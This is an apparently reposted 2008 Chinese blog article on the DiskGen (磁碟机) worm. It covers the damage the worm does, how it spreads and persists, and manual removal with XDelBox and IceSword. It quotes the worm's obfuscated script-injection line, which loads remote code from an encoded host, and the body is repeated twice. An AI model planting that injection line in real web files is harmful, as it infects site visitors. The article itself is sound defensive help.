blogger通过出售服
PC onPoint——
March 18, 2008 12:16 |
文件类型: RAR/EXE
软件大小: MB
软件类别: 国产软件
软件语言: 简体中文
授权方式: 共享软件
运行环境: Win2003,WinXP,Win2000,Win9X
更新时间: 2008-02-13
当前地址: http://www.54vb.com
病毒评估
病毒危害:
1 破坏本机杀毒软件运行,删除本机杀毒软件服务、驱动等。
2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。
3 释放DLL文件,注册COM组件,弹出广告,下载其他病毒、木马。
4 中毒后系统无法进入安全模式、组策略功能也被禁用。
传播形式:
1 病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下:
lsass.exe , smss.exe, netcfg.dll, netcfg.000
释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。
2 启动lsass.exe,smss.exe进程,感染文件。然后加载netcfg.dll,并全局注入dnsq.dll。
3 dnsq.dll文件负责监视杀毒软件及工具的运行,如果发现就将其关闭,关且它还监控病毒进程lsass.exe和smss.exe。
4 该病病毒会感染三种类型的文件:
1)网页文件:.htm, .html, .js
感染方法:在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>
2)可执行程序:.exe
被感染的exe文件有三个部分组成:
a)加了被感染程序图标的病毒体。
b)被加密的原程序。
c)加密的病毒体。
3)压缩文件:.rar, .zip
将压缩包内文件解压,并感染,再打包。
5 在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件,实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件,其中*为一串随机数字。
6 破坏安全模式、删除注册表中“显示隐藏文件属性”键值。
清楚病毒
目前SanLen磁碟机病毒专杀共可清除三个磁碟机病毒变种,即:
Worm.Win32.DiskGen.ci
Worm.Win32.DiskGen.ca
Worm.Win32.DiskGen.xx
预防和处理办法:
1 关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。
2 及时升级系统漏洞。
3 将病毒库升级到最新,并开启防病毒软件的实时监控。
下载地址:
下载文件
[高级用户]可参考以下手工处理方法:
1、猫叔的《菜鸟也能灭掉“磁碟机”》
http://forum.ikaka.com/topic.asp?board=28&artid=8427464
2、清新阳光的《利用瑞星主动防御碾死"磁碟机"新变种(pagefile.pif,lsass.exe.smss.exe)》
http://forum.ikaka.com/topic.asp?board=28&artid=8413635
3、使用XDelBox删除病毒文件(仅限操作系统安装在C:\Windows目录)
XDelBox使用方法:http://forum.ikaka.com/topic.asp?board=28&artid=8381032
使用时一定拔掉所有移动存储设备,将下面分隔线中的的文件路径全部复制,然后打开XDelBox直接使用右键菜单的“剪贴板导入不检查路径”导入,勾选“抑制再生”、“驱动安全删除模式”、“备份文件”,最后选择右键菜单的“立刻重启删除”。
———————————————————————————————————————
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\dnsq.dll
C:\037589.log
———————————————————————————————————————
重启计算机后会看到一个请选择要启动的操作系统的提示,倒计时5秒,
第一个选项是你自己的Windows系统,
第二个选项是XDelBox的Go XDelBox To Del Files,
默认自动选择第二项,会进入类似DOS的界面,这期间什么操作都不用做,等待它自动运行即可,
待病毒文件删除后会自动重启回到Windows系统,
此时不要双击或右键单击打开任何分区,用冰刃删除每个分区下的autorun.inf和pagefile.pif
最后升级杀毒软件到最新版,全盘杀毒。
———————————————————————————————————————
常用工具下载:
XDelBox下载:
http://www.dodudou.com/down/ 打开后选择【原创软件】,下载“XDELBOX 磁碟机专用测试版”
冰刃下载:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
windows清理助手下载:http://www.arswp.com/download.html
修复被破坏的“隐藏受保护的操作系统文件(推荐)”选项:
http://img.namipan.com/downfile/16da398cfcdf2ddffad9c580c3f94f13656e29038e020000/%E9%9A%90%E8%97%8F%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6.zip
清理临时文件工具ATF-Cleaner-cn下载:
http://img.namipan.com/downfile/40e62f751ebd7f3e378fc6247a66b25dc428dbbc3fcd0000/ATF-Cleaner-cn.zip
IframeKill下载:(快速清除网页文件中的恶意代码)
http://img.namipan.com/downfile/00e5b209abc5ced57d8136dad2390f2329c884dac24f0300/IframeKill.zip
软件大小: MB
软件类别: 国产软件
软件语言: 简体中文
授权方式: 共享软件
运行环境: Win2003,WinXP,Win2000,Win9X
更新时间: 2008-02-13
当前地址: http://www.54vb.com
病毒评估
病毒危害:
1 破坏本机杀毒软件运行,删除本机杀毒软件服务、驱动等。
2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。
3 释放DLL文件,注册COM组件,弹出广告,下载其他病毒、木马。
4 中毒后系统无法进入安全模式、组策略功能也被禁用。
传播形式:
1 病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下:
lsass.exe , smss.exe, netcfg.dll, netcfg.000
释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。
2 启动lsass.exe,smss.exe进程,感染文件。然后加载netcfg.dll,并全局注入dnsq.dll。
3 dnsq.dll文件负责监视杀毒软件及工具的运行,如果发现就将其关闭,关且它还监控病毒进程lsass.exe和smss.exe。
4 该病病毒会感染三种类型的文件:
1)网页文件:.htm, .html, .js
感染方法:在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>
2)可执行程序:.exe
被感染的exe文件有三个部分组成:
a)加了被感染程序图标的病毒体。
b)被加密的原程序。
c)加密的病毒体。
3)压缩文件:.rar, .zip
将压缩包内文件解压,并感染,再打包。
5 在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件,实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件,其中*为一串随机数字。
6 破坏安全模式、删除注册表中“显示隐藏文件属性”键值。
清楚病毒
目前SanLen磁碟机病毒专杀共可清除三个磁碟机病毒变种,即:
Worm.Win32.DiskGen.ci
Worm.Win32.DiskGen.ca
Worm.Win32.DiskGen.xx
预防和处理办法:
1 关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。
2 及时升级系统漏洞。
3 将病毒库升级到最新,并开启防病毒软件的实时监控。
下载地址:
下载文件 [高级用户]可参考以下手工处理方法:
1、猫叔的《菜鸟也能灭掉“磁碟机”》
http://forum.ikaka.com/topic.asp?board=28&artid=8427464
2、清新阳光的《利用瑞星主动防御碾死"磁碟机"新变种(pagefile.pif,lsass.exe.smss.exe)》
http://forum.ikaka.com/topic.asp?board=28&artid=8413635
3、使用XDelBox删除病毒文件(仅限操作系统安装在C:\Windows目录)
XDelBox使用方法:http://forum.ikaka.com/topic.asp?board=28&artid=8381032
使用时一定拔掉所有移动存储设备,将下面分隔线中的的文件路径全部复制,然后打开XDelBox直接使用右键菜单的“剪贴板导入不检查路径”导入,勾选“抑制再生”、“驱动安全删除模式”、“备份文件”,最后选择右键菜单的“立刻重启删除”。
———————————————————————————————————————
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\dnsq.dll
C:\037589.log
———————————————————————————————————————
重启计算机后会看到一个请选择要启动的操作系统的提示,倒计时5秒,
第一个选项是你自己的Windows系统,
第二个选项是XDelBox的Go XDelBox To Del Files,
默认自动选择第二项,会进入类似DOS的界面,这期间什么操作都不用做,等待它自动运行即可,
待病毒文件删除后会自动重启回到Windows系统,
此时不要双击或右键单击打开任何分区,用冰刃删除每个分区下的autorun.inf和pagefile.pif
最后升级杀毒软件到最新版,全盘杀毒。
———————————————————————————————————————
常用工具下载:
XDelBox下载:
http://www.dodudou.com/down/ 打开后选择【原创软件】,下载“XDELBOX 磁碟机专用测试版”
冰刃下载:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
windows清理助手下载:http://www.arswp.com/download.html
修复被破坏的“隐藏受保护的操作系统文件(推荐)”选项:
http://img.namipan.com/downfile/16da398cfcdf2ddffad9c580c3f94f13656e29038e020000/%E9%9A%90%E8%97%8F%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6.zip
清理临时文件工具ATF-Cleaner-cn下载:
http://img.namipan.com/downfile/40e62f751ebd7f3e378fc6247a66b25dc428dbbc3fcd0000/ATF-Cleaner-cn.zip
IframeKill下载:(快速清除网页文件中的恶意代码)
http://img.namipan.com/downfile/00e5b209abc5ced57d8136dad2390f2329c884dac24f0300/IframeKill.zip
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=logo}
![KuMoo's Blog - [ Box Stop Here ]](http://www.kumoo.net/logo.gif){kind=logo}
Name:小竹熊
Name:KuMoo